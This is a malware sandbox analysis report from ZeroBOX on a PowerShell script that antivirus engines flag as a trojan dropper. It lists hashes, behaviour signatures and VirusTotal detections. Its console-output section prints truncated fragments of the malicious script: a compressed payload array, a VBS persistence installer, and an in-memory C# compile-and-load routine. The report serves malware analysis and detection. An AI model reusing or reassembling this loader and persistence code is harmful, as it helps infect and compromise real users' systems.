Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Nov. 3, 2021, 9:28 a.m.	Nov. 3, 2021, 9:30 a.m.

Size	68.8KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`2128b1e48b141fb28a965c8057ae2a8e`
SHA256	`8b276db153885965b07c9d548363703456bc5eb27d26775117b25a32a46ae16c`
CRC32	`8317DAA6`
ssdeep	`1536:JGC0FKzo/rJV4Jx59PwpMvj7QInrLdJg9mRY1tM:MFKE9WJ1PRnrJJgUGM`
Yara	Generic_Malware_Zero - Generic Malware

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\2u57ldpor8.ps1
1960

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (50 out of 776 events)

Time & API	Arguments	Status	Return
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: The "=" operator is missing after a named argument. console_handle: 0x00000023	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\2u57ldpor8.ps1:1 char:10325 console_handle: 0x0000002f	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: + Add-Type -AssemblyName System.Windows.Forms;Add-Type -AssemblyName Microsoft. console_handle: 0x0000003b	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: VisualBasic;Add-Type -AssemblyName Microsoft.CSharp;Add-Type -AssemblyName Syst console_handle: 0x00000047	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: em.Management;Add-Type -AssemblyName System.Web;[Byte[]] $RUNPE = @(31,139,8,0, console_handle: 0x00000053	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: ,233,175,244,227,151,252,63,27,59,51,201,112,42,0,0,0);Function INSTALL() {[Str console_handle: 0x000005e7	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: ing] $VBSRun = [System.Text.Encoding]::Default.GetString(@(83,101,116,32,79,98, console_handle: 0x000005f3	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: ,101,32,34,32,38,32,34,37,70,105,108,101,80,97,116,104,37,34,44,32,48));[System console_handle: 0x0000062f	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: .IO.File]::WriteAllText(([System.Environment]::GetFolderPath(7) + '\' + 'TurnOn console_handle: 0x0000063b	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: SystemDisplay.vbs'), $VBSRun.Replace('%FilePath%', $PSCommandPath))};Function D console_handle: 0x00000647	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: ecompress {[CmdletBinding()]Param ([Parameter(Mandatory, <<<< ValueFromPipeline console_handle: 0x00000653	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: ,ValueFromPipelineByPropertyName)][byte[]] $byteArray = $(Throw('-byteArray is console_handle: 0x0000065f	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: required')));Process {;$input = New-Object System.IO.MemoryStream( , $byteArray console_handle: 0x0000066b	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: );$output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System. console_handle: 0x00000677	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress console_handle: 0x00000683	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: );$gzipStream.CopyTo( $output );$gzipStream.Close();$input.Close();[byte[]] $by console_handle: 0x0000068f	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: teOutArray = $output.ToArray();return $byteOutArray}};function CodeDom([Byte[]] console_handle: 0x0000069b	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: $BB, [String] $TP, [String] $MT) {$dictionary = new-object 'System.Collections console_handle: 0x000006a7	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: .Generic.Dictionary[[string],[string]]';$dictionary.Add('CompilerVersion', 'v4. console_handle: 0x000006b3	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: 0');$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionar console_handle: 0x000006bf	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: y);$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters; console_handle: 0x000006cb	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: $CompilerParametres.ReferencedAssemblies.Add('System.dll');$CompilerParametres. console_handle: 0x000006d7	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: ReferencedAssemblies.Add('System.Management.dll');$CompilerParametres.Reference console_handle: 0x000006e3	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: dAssemblies.Add('System.Windows.Forms.dll');$CompilerParametres.ReferencedAssem console_handle: 0x000006ef	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: blies.Add('mscorlib.dll');$CompilerParametres.ReferencedAssemblies.Add('Microso console_handle: 0x000006fb	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: ft.VisualBasic.dll');$CompilerParametres.IncludeDebugInformation = $false;$Comp console_handle: 0x00000707	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: ilerParametres.GenerateExecutable = $false;$CompilerParametres.GenerateInMemory console_handle: 0x00000713	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: = $true;$CompilerParametres.CompilerOptions += '/platform:X86 /unsafe /target: console_handle: 0x0000071f	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: library';$BB = Decompress($BB);[System.CodeDom.Compiler.CompilerResults] $Compi console_handle: 0x0000072b	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: lerResults = $CsharpCompiler.CompileAssemblyFromSource($CompilerParametres, [Sy console_handle: 0x00000737	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: stem.Text.Encoding]::Default.GetString($BB));[Type] $T = $CompilerResults.Compi console_handle: 0x00000743	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: ledAssembly.GetType($TP);[Byte[]] $Bytes = Decompress(([System.Web.HttpUtility] console_handle: 0x0000074f	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: ::UrlDecodeToBytes('%1f%8b%08%00%00%00%00%00%04%00%b4%bd%09%7c%5b%c5%b5%3f%3e%b console_handle: 0x0000075b	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: aW%baZ%bcJ%b6e%3b%de%e4%84%04%c5I%9c%d8%8e%1d%3b%24!%5e%13%27%f1%12oq%02%d4%91m console_handle: 0x00000767	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: %d9Vb%eb*%92%ec%c4I%13%9c%02%05%ca%5e%a04%a5%bc%02%a1%8f%97WhKWZ%fa%7e%c0%2b%d0 console_handle: 0x00000773	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: %f6QZ%e0QZ%96%b4%f0%a7%0bt%a7%d0%85.%f0%fb%9e3%f7J%b2%13(%fd%7d%3e%7f%82%ce%9ds console_handle: 0x0000077f	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: f%e6%cc%993g%ce93%ba%b6%3b%f6%5c%2fT!%84%15%9fw%de%11%e2%7e!%ff%db%2c%fe%f9%7fs console_handle: 0x0000078b	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: %f8d%96%7d%3dS%7c%c9%f9D%f9%fd%96%1dO%94%f7M%84b%beHT%1f%8f%06%a6%7c%23%81pX%8f console_handle: 0x00000797	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: %fb%86%83%be%e8t%d8%17%0a%fbZ%baz%7dS%fah%b02%23%c3u%8e%c1%a3%bbU%88%1d%16U%a4% console_handle: 0x000007a3	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: b9n%dck%f2%7dI(%22%cd%e2%10%e2%1e+%d9%92%f6%7f%1e%07%f0q%a5%94%8e%ca%8a%94%5b%8 console_handle: 0x000007af	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: 8%e4S%f8%2cL%17%5c%bd%f92f%c0%3c%b2%13%bc%b2S%e60%0a%be%bb%e4%a0%e2%cf%19g%9b%a console_handle: 0x000007bb	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: 5E%a4%bf%0f%5d%9c%f1%1f%e4s%a4%a0%0e%e0%5bS%f0%cax%f0P%1c%cfG%3e%23%db%f2%5c%95 console_handle: 0x000007c7	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: 3X%ec%ad%8c%c6%a2%23%c2%90%0d2%8aL%7c%3e%3b%bf%ddf%fc_%19%0dN%eah%98n%c8%cc%bc% console_handle: 0x000007d3	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: beqF%bb%a6%85b%de%fe%b8%7cn%e5%e1m%e2K%17%09%f1%f9)%e6%40%1f%ed%7d%cd5u%5eb%b5% console_handle: 0x000007df	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: b8%10%cfR%c5%bfH%08W%c5%a2c%b9X%9c%8aRe%8e%9f%8b%8e%e5%19h%9eD%bd%06%ea%95h%be% console_handle: 0x000007eb	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: 81%e6K%b4%c0%40%0b%24Zh%a0%85%12%5dd%a0%8b%24Z%24%1f%c5%06%b5X%a2%25%06Z%22%d1R console_handle: 0x000007f7	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: %03%e5g%85%e2%87B%5c%de%b7%d5%8a%eaci%a0%a8z3%09%fd%d7%d8%171%f5%a5%d1%ff%f2%88 console_handle: 0x00000803	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: %88%feo(%fa%c7A%8e%5e%96%23%22%7e%b0u%e9%25%04%b0r%9a%fe%1fT%8b%85%d2%7c%afb%1b console_handle: 0x0000080f	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: %f9%bd%d4%fd%f9%85%dd%a3%9fBOn%bfT%16%89%a8%2c%60P1%10%23%8d%cd%d14b%13T*%23%19 console_handle: 0x0000081b	1	1
WriteConsoleW Nov. 3, 2021, 9:28 a.m.	buffer: %af%cd%12%fe%95%a8%ce%b2%f8W%e1%f1%24V%a4%c8%1f%40%b5_%07%f84%a1%15%1f%8dV%e5B4 console_handle: 0x00000827	1	1

Uses Windows APIs to generate a cryptographic key (4 events)

Time & API	Arguments	Status	Return
CryptExportKey Nov. 3, 2021, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050d23e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2021, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050d23e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2021, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00579960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2021, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00579960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 3, 2021, 9:28 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (19 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 2031616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06410000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065dd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065de000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f2f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ef9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x058f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x058f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2021, 9:28 a.m.	process_identifier: 1960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x058f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

File has been identified by 3 AntiVirus engines on VirusTotal as malicious (3 events)

ESET-NOD32	PowerShell/TrojanDropper.Agent.NO
Kaspersky	HEUR:Trojan.PowerShell.Invoker.gen
ZoneAlarm	HEUR:Trojan.PowerShell.Invoker.gen

2u57ldpor8

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All